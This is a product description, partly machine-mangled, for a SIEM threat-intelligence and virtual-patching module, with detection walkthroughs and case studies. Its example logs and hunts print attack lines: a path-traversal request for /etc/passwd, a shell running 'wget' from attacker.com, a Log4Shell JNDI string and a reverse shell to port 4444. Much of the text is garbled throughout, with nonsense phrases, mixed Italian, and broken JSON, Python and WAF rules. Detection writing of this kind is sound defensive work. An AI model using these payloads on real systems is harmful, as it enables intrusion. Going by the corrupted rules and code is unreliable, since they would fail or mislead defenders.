Intellidog – Threat Intelligence Module for MicroSIEM

Product Description

Intellidog is the premium threat intelligence module that transforms MicroSIEM from responsive monitoring system to proactive threat hunting platform. Through integration with global intelligence sources (MISP, Shodan, AlienVault OTX) and advanced behavioral analysis, Intellidog answers the critical question that each security team poses: "Is this vulnerability just theoretical or is someone already trying to exploit it on my systems? "

Unlike traditional threat intelligence feeds that merely provide IoC lists (Indicators of Compromise), Intellidog performs multi-source contextual correlation: compares known vulnerabilities (from Sentinel Core) with real system activity (syscall, application logs, network traffic from Firedog) to determine with confidence scoring if an exploit is actively used against your infrastructure.

When an official patch is not available or applicable ( legacy systems, EOL software, downtime unacceptable), Intellidog implements automated virtual patching: generates IDS/IPS-like rules that neutralize network or application exploits, providing immediate protection while working on a definitive solution.

Intellidog is not a standalone tool – is a native extension of MicroSIEM that inherits all existing monitoring infrastructure, adding the intelligence layer that makes your operating data actionable for threat detection and proactive response.

---

Main features

🌐 Threat Intelligence Multi-Source

Integrated Sources (Feed Free Included):

1. MISP (Malware Information Sharing Platform):

• Type: Community-driven threat intelligence
• Coverage:
  • Malware signatures (hash MD5/SHA-256)
  • C2 IP/domains servers
  • Attack patterns (MITRE ATT&CK mapping)
  • Ransomware campaigns
• Update: Real-time (webhook) + scheduled sync every 4 hours
• Data volume: ~500k active IoC (deduplicated)
• Community feeds:
  • CIRCL (Luxembourg CERT)
  • Botvrij.eu (Dutch AV platformer)
  • COVID-19 themed attacks
  • Ransomware trackers

Configuration:

yaml

# /opt/microsiem/intellidog/config/misp.yml
misp:
  url: https://misp-instance.org
  api_key: YOUR_API_KEY
  sync_interval: 4h
  feeds:
    - circl
    - botvrij
    - ransomware_tracker
  filters:
    tags: ["apt", "ransomware", "exploit-kit"]
    threat_level: [1, 2]  # High, Medium (skip Low/Info)

---

2. AlienVault OTX (Open Threat Exchange):

• Type: Crowdsourced threat intelligence
• Coverage:
  • Malicious IPs (botnet, C2, scanner)
  • Phishing domains
  • CVE-to-IoC mapping
  • Threat actor TTPs
• UpdateHourly
• Data volume: ~2M
• Pulses: Curated threat packages (e.g. "APT28 Campaign Q1 2024")

API Integration:

# Automatic enrichment example
def enrich_ip(ip_address):
    otx_data = otx_api.get_indicator_details_full(ip_address)
    
    return {
        'reputation_score': otx_data.reputation,
        'malware_families': otx_data.malware_families,
        'countries': otx_data.countries,
        'pulses': [p['name'] for p in otx_data.pulses[:5]]
    }

---

3. AbuseIPDB:

• Type: IP reputation database
• Coverage:
  • Reported abusive IPs (user submissions)
  • Abuse categories (SSH brute force, port scan, spam, etc.)
  • Confidence score (0-100%)
  • Geolocation + ISP info
• Update: Real-time queries
• API Limits: 1000 queries/day (free tier)

Use houses: Valid if IP suspect is known bad actor

4. Talos Intelligence (Cisco):

• Type: Vendor threat intelligence
• Coverage:
  • IP/Domain reputation
  • Email reputation (anti-spam)
  • File reputation (hash lookup)
  • Vulnerability research
• Access: Free API + threat feeds
• Specialty: Email security (spam/phishing detection)

---

Premium Sources (Optional):

5. Shodan API ($59/month $899/year):

• Type: Internet-wide scanning database
• Coverage:
  • Exposed services for IP/domain
  • Banner information (software versions)
  • Vulnerability identification
  • Historical date (when service appeared online)
  • SSL certified info

Why Shodan for Intellidog:

• Asset validation exposure: "Is my RDP server exposed the Internet?" → query Shodan
• Vulnerability confirmation: CVE on Apache 2.4.49 → Shodan shows who has that version exposed
• Attack surface mapping: Discover forgotten/shadow IT assets

API Example:

import shodan

api = shodan.Shodan(‘YOUR API KEY’)

Check if your IP is exposed

results = api.host(‘203.0.113.50’)

print(f"Open ports: {results[‘ports’]}")
print(f)Vulnerabilities: {results.get(‘vulns’, [)})
print(f)Last update: {results[‘last update’]})

Output:

Open ports: [22, 80, 3306]

Vulnerabilities: [‘CVE-2021-41773’]

Last update: 2024-01-15

**ROI Shodan**: Se rilevi 1 vulnerabilità exposed critica grazie a Shodan → eviti breach → $59/mese è trascurabile vs costo incident (€50k-500k).

---

**6. VirusTotal API (Premium):**
- **Tipo**: Multi-AV file/URL/IP scanning
- **Coverage**:
  - File hash reputation (70+ AV engines)
  - URL/Domain reputation
  - IP reputation
  - Passive DNS data
  - Malware behavioral analysis
- **Pricing**: Free tier limited (4 req/min), Premium $500-10k/anno

**Use case**: Suspect file/URL → query VirusTotal → 45/70 AV detect as malicious = confirmed threat

---

**7. Recorded Future (Enterprise):**
- **Tipo**: AI-powered threat intelligence platform
- **Coverage**:
  - Predictive threat intelligence
  - Dark web monitoring
  - Threat actor profiling
  - Vulnerability risk scoring (proprietary algorithm)
- **Pricing**: €30k-150k/anno (enterprise-only)

**When needed**: Large organizations (1000+ employees) con advanced threat actors targeting them (APT groups, nation-state).

---

### **🔍 Exploit Detection Engine**

**Correlation Multi-Layer:**

Intellidog determina se vulnerabilità è sfruttata attraverso correlazione 5 livelli:

**Level 1: Vulnerability Context**

Input: CVE-2024-1234 on web-prod-01 (from Sentinel Core)
Date: CVSS 9.8, EPSS 45%, Exploit public (Metasploit module available)
Asset: Apache 2.4.49, port 443 exposed Internet

**Level 2: IoC Matching**

Query threat intel feeds:
─ is MISP: CVE-2024-1234 associated with exploit signature "GET /cgi-bin/. %
AlienVault: 23 IPs recently scanning for this vuln
─ AbuseIPDB: 203.0.113.50 reported 47 times for "Web attack"

Cross-reference with log:
"It’s Apache access.log: 203.0.113.50 – [15/Jan/2024:10:30:15] "GET /cgi-bin/. %2e/%2e/etc/passwd
─ ✅ MATCH Exploit pattern detected in logs

**Level 3: Behavioral Analysis**

Syscall monitoring (via auditd/eBPF):
─ is Process: httpd (PID 1234)
─ is Syscall: execve("/bin/sh", ["-c", "wget http://attacker.com/payload.sh"], ...)
─ is Parent: httpd (web server spawning shell = anomalous)
─ ⚠️ ANOMALY: Web server should never spawn shell

File system monitoring:
is it? New file: /tmp/.hidden backdoor (suspicious location + hidden file)
─ is Permissions: 0777 (world-writable = red flag)
─ ⚠️ ANOMALY: Unexpected file creation in /tmp

**Level 4: Network Analysis**

PCAP analysis (by Firedog):
─ is Outbound connection: web-prod-01 → 198.51.100.20:4444
─ is Protocol: Raw TCP (non-standard port)
"It’s Timing." Immediately after suspicious Apache request
Volume: 15 MB transfer (potential data exfiltration)
─ ⚠️ ANOMALY: Web server initiating outbound connection to non-whitelisted IP

DNS queries (from monitoring logs):
It is Query: c2-server-xyz123.attacker-domain. Community
"It’s Frequency." Every 60 seconds (beaconing pattern)
─ ⚠️ ANOMALY: C2 communication pattern detected

**Level 5: Pattern Recognition**

Known exploit patterns (signature-based):
"It’s Apache path traversal: ✅ Detected
─ is Command injection: ✅ Detected (execve syscall)
Reverse shell: ✅ Detected (outbound connection to non-standard port)
─ Data exfiltration: ✅ Suspected (volume transfers)

Attack chain reconstruction:

1. [10:30:15] Exploit attempt (path traversal)
2. [10:30:16] Command execution (wget payload)
3. [10:30:18] Backdoor installation (/tmp/.hidden backdoor)
4. [10:30:20] C2 connection established (198.51.100.20:4444)
5. [10:30:25] Data exfiltration begins (15 MB transferred)

CONCLUSION: Exploit CONFIRMED with HIGH confidence

---

**Confidence Scoring:**

Confidence Score (0-100%) = weighted sum([
I'm not doing this. * 0.25, # Threat intel correlateon
Wellavioral anomaly * 0.30, # Syscall/filesystem anomalies
Network anomaly * 0.25, # C2 communication patterns
Pattern match * 0.20 Known exploit signatures
])

Classification:
─ is 0-30% = LOW (Ambiguous abnormality, monitoring)
─ is 30-70% = MEDIUM (Support, investigated)
─ is 70-90% = HIGH (Probable exploit, urgent remediate)
─ 90-100% = CONFIRMED (Exploit confirmed, incident response)

Example Output:

{
"vulnerability": "CVE-2024-1234",
"asset": "web-prod-01",
"confidence": 92.
"classification": "CONFIRMED",
"evidence": {
"ioc matches": ♪
{
"source": "MISP",
"type": "exploit pattern"
"value" "GET /cgi-bin/. %
"timestamp": "2024-01-15T10:30:15Z"
}
],
"behavioral anomalies" ♪
{
"type": "process spawn"
"description": "httpd spawned /bin/sh",
"severity"
},
{
"type": "file creation",
"path"
"severity": "critical"
}
],
"network anomalies" ♪
{
"type": "c2 communication",
"destination": "198.51.100.20:4444",
"protocol": "tcp",
"volume mb": 15
}
]
},
"recommendations": ♪
"Island assets web-prod-01 from network immediately",
"Kill process PID 1234 and children",
"Remove backdoor file /tmp/.hidden backdoor",
"Block IP 198.51.100.20 at firewall (Firedog)",
"Apply patch for CVE-2024-1234 (Apache 2.4.50+)",
"Investigated data exfiltrated (forensic analysis required)"
]
}

---

### **🛡️ Virtual Patching Automatizzato**

**Cos'è Virtual Patching:**

Quando patch ufficiale non disponibile/applicabile, Intellidog crea "patch virtuale" = regole che bloccano exploit senza modificare software vulnerabile.

**Use Cases Virtual Patching:**

**1. Software EOL (End-of-Life):**

Scenario: Windows Server 2008 R2 with IIS 7.5
Problem: Microsoft no longer releases patch
Vulnerability: CVE-2023-XX (RCE in IIS)
Solution: Virtual patch blocks exploit pattern across the network

**2. Patch Non Applicabile:**

Scenario: Legacy application Java 6 (vendor out-of-business)
Problem: CVE Critical, no patch available
Solution: Virtual patch blocks malicious input before it reaches app

**3. Downtime Inaccettabile:**

Scenario: Production system 24/7 (e.g. SCADA, medical device)
Problem: Patch requires reboot, downtime coast €50k/hour
Solution: Virtual patch protects while schedula maintenance window

**4. Patch Delayed:**

Scenario: Zero-day published, patch vendor ETA 2 weeks
Problem: Asset exposed during window vulnerability
Solution: Virtual patch protects immediately while you wait for patch

Virtual Patching Mechanisms:

1. Network-Level Blocking (via Firedog):

Example: Apache path traversal CVE-2021- 41773

Exploit pattern: /../ in URL path

Firedog/iptables rule

iptables -A INPUT -p tcp –dport 80 -m string –algo bm –string "/../" -j LOG –log-prefix "VPATCHED CVE202141773: "
iptables -A INPUT -p tcp –dport 80 -m string –algo bm –string "/../" -j DROP

Alternative: Use Suricata/Snort IDS rule

alert http any any -> $HOME NET 80 (
msg:"Virtual Patch – Apache Path Traversal CVE-2021-41773";
flow:to server,established;
content:"/../"; http uri;
sid:1000001;
rev:1;
)

Pros:

• ✅ Immediate protection (apply in seconds)
• ✅ No application required
• ✅ Reversible (remove rule when patch applied)

Cons:

• ⚠️ False positives possible (legit request with /../ in URL)
• ⚠️ Bypass possible (encoding variations: ..%2F, ..%5C)

2. Application-Level Filtering (ModSecurity WAF):

ModSecurity rule for virtual patch

SecRule REQUEST URI "@contains /../"
"id:1000001,
phase:2,
deny
status:403,
log,
msg:’Virtual Patch – Path Traversal Attempt CVE-2021-41773"

Advanced: Block multiple encoding variations

SecRule REQUEST URI "@rx (?../|.|..%2[fF]|..%5[cC]"
"id:1000002,
phase:2,
deny
status:403,
log,
msg:’Virtual Patch – Encoded Path Traversal’"

**Pros**:
- ✅ More granular (HTTP-aware)
- ✅ Handles encoding variations
- ✅ Better logging (HTTP context)

**Cons**:
- ⚠️ Requires ModSecurity installed
- ⚠️ Performance overhead (regex matching)

---

**3. System-Level Mitigation (AppArmor/SELinux):**

AppArmor profile for Apache

/etc/apparmor.d/usr.sbin. httpd:

includes

/usr/sbin/httpd {
♪ Including
♪ Including

♪ Deny access to sensitive paths (even if path traversal succeeds)
deny /etc/passwd r,
deny /etc/shadow r,
deny /root/** rw,
/ deny** rw,

# Allow only web root
/var/www/** r,
/var/www/html/** rw,
}

Pros:

• ✅ Defense-in-depth (although exploit bypassa WAF)
• ✅ Kernel-level enforcement (hard to bypass)

Cons:

• ⚠️ Requires SELinux/AppArmor enabled
• ⚠️ Complex policy creation

4. Service Edittion (Feature Disable):

Example: Disable vulnerable PHP function

/etc/php/7.4/apache2/php. In

disable functions = exec,passthru,shell exec,system,proc open,popen,curl exec,curl multi exec,parse ini file,show source

Disable dangerous Apache modules

a2dismod cgi
a2dismod cgid
systemctl reload apache2

**Pros**:
- ✅ Eliminates vulnerability completely (se feature non necessaria)
- ✅ Zero performance overhead

**Cons**:
- ⚠️ May break legitimate functionality
- ⚠️ Requires application compatibility testing

---

**Virtual Patch Lifecycle:**

**Phase 1: Detection**

Intellidog detects:
CVE-2024-1234 on web-prod-01
is it? No patch available (EOL software)
─ is Asset exposed Internet (high risk)
─ Exploit PoC public (Metasploit module exists)

Decision: Virtual patching required

**Phase 2: Patch Creation**

Intellidog analyzes:
─ is CVE details (NVD, vendor advisory)
Exploit PoC code (identify attack pattern)
is Asset configuration (Apache, ModSecurity available? )
─ Generate virtual patch rules

Options:
[1] Network-level block (iptables) – IMMEDIATE
[2] WAF rule (ModSecurity) – RECOMMENDED
[3] AppArmor profile – DEFENSE-IN-DEPTH

**Phase 3: Testing (Critical!)**

Deploy virtual patch in ALERT-ONLY mode:
─ is Rules log but don’t block (24-48 hours)
Monitor false positives
Verify legitimate traffic unaffected
"Your rules if necessary

Metrics:
"Exploit attempts blocked: 47
─ is False positives: 2 (legit CDN request with encoded URL)
Action: Whitelist CDN IP range

**Phase 4: Activation**

After testing successful:
Switch from ALERT to BLOCK mode
Notify SOC team: "Virtual patch active on web-prod-01"
─ is Schedule re-scan (verify exploit blocked)
─ Document in change management

**Phase 5: Monitoring**

Continuous validation:
Count exploit attempts blocked (daily)
─ is Monitor false positive rate (<1% acceptable)
─ is Alert if bypass detected (new exploit variant)
─ Weekly review: Is official patch now available?

**Phase 6: Decommissioning**

When official patch available:
─ is Apply vendor patch (maintenance window)
─ is Verify vulnerability resolved (re-scan)
─ is Remove virtual patch rules (cleanup)
─ Document: "CVE-2024-1234 patched, virtual patch retired"

---

**Virtual Patch Success Metrics:**

Virtual Patch Report – CVE-2024- 12
═══════════════════════════════════════

Deployment Date: 2024-01-15
Decommission Date: 2024-01-29 (14 days active)

Protection Stats:
"Exploit attempts blocked: 1,247
─ is Unique attacker IPs: 89
─ is False positives: 3 (0.24%)
"It’s Bypass attempts: 0
─ Downtime during virtual patch: 0 minutes

Business Impact:
─ is Asset protected: web-prod-01 (revenue-critical)
─ is Estimated breach cost avoided: €250k
─ is Downtime avoided: 0 hours (vs 4 hours for emergency patching)
─ ROI: 25000% (patch cost) €1k, breach cost avoided €250k)

Recommendation: Virtual patching strategy validated ✅

🎯 Threat Hunting Proactive

Sigma Rules Library:

Intellidog includes 500+ detection rules format Sigma (vendor-agnostic detection format).

Sigma Rule Example:

title: Suspicious PowerShell Execution
id: 91afbe0e-8cc7-4a9a-9e7c-91afbe0e8cc7
status: stable
description: Detects suspicious PowerShell command patterns
references:
– https://attack.mitre.org/techniques/T1059/001/
author: Intellidog Team
dates: 2024/01/15
tags:
– attack. execution
– attack. t1059.001
logsource:
product: linux
service: audit
detection:
selection:
type: ‘EXECVE’
♪|contains: ‘powershell’
A1|contains:
– ‘-enc’ # Encoded command
– ‘-NoProfile’
– ‘-WindowStyle Hidden’
– ‘Invoke-Expression’
– IEX
– ‘DownloadString’
condition: selection
falsepositives:
– Legitimate PowerShell scripts
level: high

**Rule Categories:**
- **Persistence** (T1547): Startup scripts, cron jobs anomali
- **Privilege Escalation** (T1068): Kernel exploits, SUID abuse
- **Defense Evasion** (T1070): Log clearing, timestomping
- **Credential Access** (T1003): Credential dumping, keylogging
- **Discovery** (T1087): Network scanning, user enumeration
- **Lateral Movement** (T1021): SSH/RDP lateral movement
- **Collection** (T1005): Data staged for exfiltration
- **Exfiltration** (T1041): Data transfer to external hosts

---

**Custom Query Builder:**

**UI-based query creation:**

Query: Find all SSH login attempts from IPs with AbuseIPDB score > 80

[Field: log type] [Operator: equals] [Value: auth]
AND
[Field: event] [Operator: contains] [Value: ssh login]
AND
[Field: source ip] [Operator: reputation score gt] [Value: 80] [Source: AbuseIPDB]

Time range: Last 30 days
Group by: source ip
Order by: count DESC

**Query Result:**

╔═══════════════╦═══════╦══════════════╦══════════════╗
Countries Source IP Count Count ║ AbuseIPDB Countries Countries Countries
╠═══════════════╬═══════╬══════════════╬══════════════╣
) 203.0.113.50 . 1.247 ) 95 (CRITICAL)) CN
) 198.51.100.20 . 892 ) 87 (HIGH) ) RU )
) 192.0.2.100 ) 456 ) 82 (HIGH) ) BR )
╚═══════════════╩═══════╩══════════════╩══════════════╝

Recommendation: Block these IPs immediately (Firedog integration)

Search for IoC in 90-day log retention

intellidog-hunt –ioc 203.0.113.50 –lookback 90d

Results:

Found 47 occurrences of 203.0.113.50 in historical logs:

[2024-01-15 10:30] SSH brute force attempt (failed)
[2024-01-14 22:15] Port scan detected (22, 80, 443, 3306)
[2024-01-10 03:45] Apache exploit attempt (CVE-2021-41773)
…
[2023-11-20 18:20] First seen (DNS query to C2 domain)

CONCLUSION: IP active for 3 months, persistent threat actor
RECOMMENDATION: Permanent ban + report to ISP team abuse

**Use case**: New IoC published today → search historical logs → discover you were compromised 3 months ago (senza saperlo).

---

**Hunting Campaigns:**

**Campaign: Log4Shell Zero-Day Hunt**

Scenario: Log4j CVE-2021-44228 (Log4Shell) announced 2021-12-10
Action: Proactive Hunt even if no vulnerability scanner ran yet

Hunting queries:

1. Search for JNDI lookup patterns in HTTP logs

• Pattern: ${jndi:ldap://attacker. com/exploit

1. Search for Java processes spawning shells

• auditd: EXECVE from java parent process

1. Search for outbound LDAP connections (unusual)

• netstat logs: connections to port 389/636 external

1. Search for known exploit payloads

• IoC feed: Log4Shell payload signatures

Results:
3 servers with Log4j vulnerable version detected
─ is 2 servers with exploit attempts in logs (BLOCKED by WAF)
─ is 0 servers compromised (confirmed via forensics)
─ Action: Emergency patching completed in 4 hours

**Timeline Saved**:
- Without Intellidog: Discover vulnerability on next weekly scan (7 days delay)
- With Intellidog: Proactive hunt discovered same day (0 days delay)
- **Impact**: Prevented potential breach during 7-day window

---

### **📊 Reporting & Visualization**

**Threat Intelligence Dashboard:**

╔═══════════════════════════════════════════════════════════╗
Intellidog Threat Intelligence
Last 24 Hours
╠═══════════════════════════════════════════════════════════╣
║ ║
: IoC Matches: 247 :
: is MI─SP: 123 :
Ali─enVault OTX: 89 :
AbuseIPDB: 35 :
) : : Shodan: 15 (asset exposure alerts) )
║ ║
Exploit Detection: :
: is Confirmed: 3 🔴 ║
: is High─ Confidence: 12 : :
Medium: 45 : :
: : Low: 187 : :
║ ║
: Virtual Patches Active: 5:
) is C─VE-2024-1234 (Apache) – 47 exploits blocked )
) is C─VE-2023-5678 (OpenSSL) – 12 exploits blocked )
║ └─ […] ║
║ ║
Top Threat Actors: ║
) 1. 203.0.113.50 (CN) – 1,247 attempts )
) 2. 198.51.100.20 (RU) – 892 attempts )
) 3. 192.0.2.100 (BR) – 456 attempts )
║ ║
╚═══════════════════════════════════════════════════════════╝

Exploit Confirmation Report

Dates: 2024-01-15 10:35
Assets: web-prod-01 (192.168.1.50)
Vulnerability: CVE-2024-1234 (Apache Path Traversal)
Confidence: 92% (CONFIRMED)

Timeline

• 10:30:15 – Exploit attempt detected in Apache access. log log
• 10:30:16 – Command confirmed (auditd syscall)
• 10:30:18 – Backdoor file created /tmp/.hidden_backdoor
• 10:30:20 – C2 connection established at 198.51.100.20:4444
• 10:30:25 – Data exfiltration begins (15 MB transferred)
• 10:35:00 – Incident detected by Intellidog

Evidence

IoC Matches

• MISP: Exploit pattern GET /cgi-bin/.%2e/%2e%2e/ (Confidence: 95%)
• AlienVault: IP 203.0.113.50 in pulse "Apache CVE-2024-1234 Exploit Campaign"
• AbuseIPDB: IP 203.0.113.50 reported 47 times (Web attack)

Behavioral Anomalies

• Process: httpd (PID 1234) spawned /bin/sh (CRITICAL) )
• File: Created /tmp/.hidden_backdoor with 0777 permissions (CRITICAL )
• Network: Outbound connection to 198.51.100.20:4444 )

Networking

• Protocol: Raw TCP (non-HTTP)
• Volume: 15 MB outbound (potential data exfiltration)
• Duration: 5 minutes continuous connection

Recommended Actions

1. ✅ IMMEDIATES: Isolated web-prod-01 from network
2. ✅ URGENT: Kill process PID 1234 and children
3. ✅ URGENT: Remove /tmp/.hidden_backdoor
4. ✅ URGENT: Block IP 203.0.113.50 at firewall (Firedog)
5. ⏳ 24h: Apply Apache patch (version 2.4.50+ )
6. ⏳ 48h: Forensic analysis of exfiltrated data
7. ⏳ 7: Full system reinstall (compromised system)

Status

• [x] Incident response team alert (10:36)
• [x] Asset isolated (10:37)
• [x] Malicious process ended (10:38)
• [x] IP blocked (10:39)
• [ ] Patch applied (scheduled 2024-01-16 02:00)
• [ ] Forensic analysis (in progress)

Report generated by: Intellidog v2.1.0
Analyst: auto-generated (reviewed by: admin@company.com)

---

**Weekly Threat Intelligence Digest:**

═══════════════════════════════════════════════════════════
Intellidog Weekly Digest – 2024-01-15 to 2024-01- 22
═══════════════════════════════════════════════════════════

📊 SUMMARY
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Total IoC Matches: 1.847
Exploit Detections: 15 (3 confirmed, 12 high-confidence)
Virtual Patches Deployed: 2 new
Threat Hunting Campaigns: 1 completed
Assets Protected: 50

🔴 CRITICAL FINDINGS
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

1. CVE-2024-1234 Exploitation Confirmed
   ─ is Asset: web-prod-01
   ─ is Action Taken: Isolated + Patched
   Attacker: 203.0.113.50 (CN)
   : Status: RESOLVED ✅
2. Persistent SSH Brute Force Campaign
   ─ is Assets: db-prod-01, db-prod-02
   ─ is Attacker: 198.51.100.20 (RU)
   ─ is Attempts: 8,923 (all blocked)
   ─ Action: IP banned + SSH port changed

🟡 NOTABLE TRENDS
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

• Attack volume +35% vs previous week
• Top targeted service: SSH (45% of attacks)
• Geographic origin: CN 40%, RU 30%, US 15%, Other 15%
• New threat actor: 192.0.2.100 (first seen 2024-01-18)

🛡️
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Active Virtual Patches: 5
─ is CVE-2024-1234 (Apache): 47 exploits blocked
CVE-2023-5678 (OpenSSL): 12 exploits blocked
─ Pending Removal: 1 (official patch applied)

💡 RECOMMENDATIONS
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

1. Consider geo-blocking CN/RU (80% attack origin)
2. Implementing MFA for SSH (brute force high)
3. Review 192.0.2.100 activity (new persistent actor)
4. Schedule patching for CVE-2024-5555 (new critical)

📧 Contact
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Questions? Contact: security-team@company.com
Unsubscribe: intellidog-settings@company.com

Powered by Intellidog v2.1.0 | MicroSIEM Suite

Cases of Use

Case 1: Zero-Day Response – Log4Shell

**Scenario:**
9 December 2021, 22:00 – Public Security Researcher PoC for Log4j RCE (CVE-2021-44228). Massive Exploit starts within hours. Company has 30+ Java servers in production, not knowing which they use Log4j.

**Without Intellidog:**

Timeline:
"It’s Day 0 (09/12): Zero-day announced
"It’s Day 1 (10/12): Security team reads news, starts manual check
"It’s Day 2-3: Identify which servers use Log4j (slow process)
─ is Day 4: Vulnerability scanner updated with Log4Shell detection
"It’s Day 5: Scan completed, 12 servers vulnerable identified
"It’s Day 6-7: Emergency patching (some servers require app changes)
─ Result: 7 days exposure window, 2 servers compromised (discovered later)

**With Intellidog:**

Timeline:
─ is Day 0 (09/12) 22:30: Zero-day announced
─ is Day 0 (09/12) 23:00: MISP feed updates with Log4Shell IoC
─ is Day 0 (09/12) 23:05: Intellidog auto-sync receives IoC
23:10: Intellidog launches proactive hunting:
: is Search─ HTTP logs for JNDI patterns: ${jndi:ldap://
Search─ auditd for java spawning shells
: : Query Shodan: "Which of our IPs exposes Java services? "
─ is Day 0 (09/12) 23:30: Hunt complete:
is 12─ servers identified with Log4j
) is 3─ servers with exploit attempts (WAF blocked)
) is 0─ servers compromised (confirmed)
─ is Day 0 (09/12) 23:45: Virtual patching deployed (at 12 servers):
WAF rule blocks ${jndi: patterns
"It’s Day 1 (10/12): Emergency patching begins (protected by virtual patch)
─ Result: 0 days unprotected, 0 compromises

**Impact:**
- **Time to protection**: 7 days → 45 minutes (99.5% reduction)
- **Compromise**: 2 servers → 0 servers
- **Business impact**: Potential €500k breach → €0 (prevented)

---

Case 2: APT Detection – Persistent Threat Actor

**Scenario:**
E-commerce company, 200 employees. Intellidog alert: "Suspicious outbound traffic pattern detected." Investigation reveals APT campaign.

**Detection Timeline:**

**Week 1 – Initial Compromise (Missed by Traditional Tools):**

Attacker: Spear-phishing email to Finance dept
─ is Victim opens malicious Excel (macro enabled)
─ is Macro downloads payload from legitimate-looking domain
─ Traditional AV: ❌ No detection (fileless payload, zero-day)

Intellidog detection:
is it? ✅ Outbound connection to suspicious domain (not in whitelist)
is it? ✅ Domain recently registered (Whois check)
is it? ✅ TLS certified anomaly (self-signed)
─ Alert: "Suspicious outbound connection from FINANCE-PC-01"

**Week 2 - Lateral Movement:**

Attacker: Enumerate network, move laterally
─ is Port scan internal network from FINANCE-PC-01
─ is Attempt privilege escalation (Mimikatz)
─ Access file server (credentials stolen)

Intellidog detection:
is it? ✅ Port scan detected (unusual activity from workstation)
is it? ✅ Process anomaly: lsass.exe memory read (credential dumping)
is it? ✅ File server access from unusual IP (not typical user pattern)
─ Alert: "Potential lateral movement detected"

**Week 3 - Data Exfiltration:**

Attacker: Stage date, exfiltrate to C2
─ is Compress customer database (25GB)
─ is Split into chunks, encrypt
─ Upload to attacker-controlled cloud storage

Intellidog detection:
is it? ✅ Unusual file compression activity (7z.exe, large volume)
is it? ✅ Outbound traffic spike (25GB over 2 hours – anomalous)
is it? ✅ Destination: Cloud storage IP (known C2 infrastructure for MISP)
─ Alert: "CRITICAL – Potential data exfiltration"

**Incident Response:**

With Intellidog evidence:
"Timeline reconstruction: 3 weeks compromise (complete picture)
─ Scope identification: 5 hosts compromised, 1 data exfiltration
"It’s IoC extraction: C2 domains, attacker IPs, malware hashes
─ is Network isolation: Compromised hosts quarantined
─ is Forensic analysis: 25GB customer data exfiltrated (confirmed)
─: Recovery: Systems reimaged, passwords reset, customers alert

Cost impact:
"It’s Without Intellidog: Breach discovered months later (audit), massive fine
"It’s With Intellidog: Early detection (week 3), contained quickly
─ is GDPR fine avoided: ~€500k (timely breach notification)
─ Reputation damage: Minimal (proactive customer communication)

---

### **Caso 3: Legacy System Protection - Medical Device**

**Scenario:**  
Hospital with CT scanner (medical device) running Windows XP Embedded (EOL 2016). Device manufacturer out-of-business, no updates available. Device must remain operational (patient safety), but has critical vulnerabilities.

**Challenge:**

Device specs:
─ is OS: Windows XP Embedded (EOL)
─ Software: Proprietary CT imaging software v3.2 (last update 2015)
─ is Network: Connected to hospital network (PACS integration)
─ is Vulnerabilities: 247 known CVEs (for vulnerability scan)
) is 23─ Critical (RCE, privilege escalation)
is 89.
135─ Medium/ Low
─ Patch availability: NONE (vendor defunct, OS EOL)

Compliance requirement:
"It’s HIPAA: Device processes PHI (must be protected)
─ is FDA: Medical device (cannot modify software without recertification)
─ Hospital policy: 99.9% uptime required (patient safety)

Virtual patch for SMBv1 vulnerabilities (EternalBlue, etc.)

Block SMB traffic to/from CT scanner

sudo iptables -A FORWARD -s 10.10.10.5 -p tcp –dport 445 -j DROP
sudo iptables -A FORWARD -d 10.10.10.5 -p tcp –dport 445 -j DROP

Virtual patch for RDP vulnerabilities

Block RDP except from admin workstation

sudo iptables -A FORWARD -d 10.10.10.5 -p tcp –dport 3389
! Admin workstation only

**Layer 3: Behavioral Monitoring (Intellidog)**

Monitor for anomalies:
─ is Process monitoring: Alert if unknown process starts
Network monitoring: Alert if connection to non-whitelisted IP
─ is File monitoring: Alert if system file modified
─ User monitoring: Alert if non-authorized user login

**Layer 4: Compensating Controls**

Additional measures:
─ is EDR agent (minimal footprint): CrowdStrike Falcon (read-only mode)
─ is USB disabled: Prevent malware via USB stick
─ is Dedicated admin workstation: Jump box for device access
─ Regular backups: Weekly image backup (30-min restore time)

**Result:**

Protection status:
Network attack surface: 247 CVEs → 3 reachable (98.8% reduction)
"Remaining risk: Physical access attacks only (mitigated by physical security)
─ is Uptime: 99.95% (4.4 hours downtime/year, within SLA)
"It’s Compliance." HIPAA audit passed (compensating controls documented)
─ Incidents: 0 in 2 years operation

Alternatives (without Intellidog):
"It’s Option 1: Keep device as-is → High breach risk, compliance failure
─ is Option 2: Replace device → €500k cost (new CT scanner)
─ Option 3: Air-gap device → Lose PACS integration, workflow disruption
─ Intellidog virtual patching: €5.5k/year (100x cheaper than replacement)

---

### **Caso 4: Cryptocurrency Exchange - High-Value Target**

**Scenario:**  
Crypto exchange startup, €50M AUM (Assets Under Management). Target di APT groups, ransomware gangs per high-value wallets. Necessità threat intelligence premium per early warning.

**Threat Landscape:**

Adversaries targeting crypto exchanges:
─ Nation-state APT: Lazarus Group (North Korea)
"It’s Ransomware." Accounts, LockBit, BlackCat
─ is Crypto-specific malware: ClipBanker, CryptoStealer
─ DDoS-for-ransom: Fancy Bear, Anonymous Sudan

Daily automated check

shodan results = shodan api. search("crypto-exchange.com")

if shodan results[‘total’] > expected exposure:
alert("New service exposed! Shadow IT detected? "
# Example: Developer deployed test instance, forgotten firewall

**2. Dark Web Monitoring**

Monitored forums:
─ is RaidForums (shutdown, but monitoring successors)
BreachForums
XSS.is
) Telegram channels (APT, ransomware groups)

Keywords:
"crypto-exchange." ♪
─ is Employee emails: @crypto-exchange. Community
─ is Wallet addresses (company hot wallets)
─ Database dump mentions

**3. Targeted Threat Actor Tracking**

Lazarus Group indicators (Recorded Future feed):
47 C2 domains identified
─ 23 malware families signatures
─ is attack 89er IPs (rotating)
─ TTPs: Spear-phishing, supply chain attacks, DeFi exploits

Proactive blocking:
─ is All 47 C2 domains → DNS blackhole
─ is All 89 IPs → Firedog ban
─ Employees trained: Lazarus-specific phishing awareness

**Incident: Thwarted Attack**

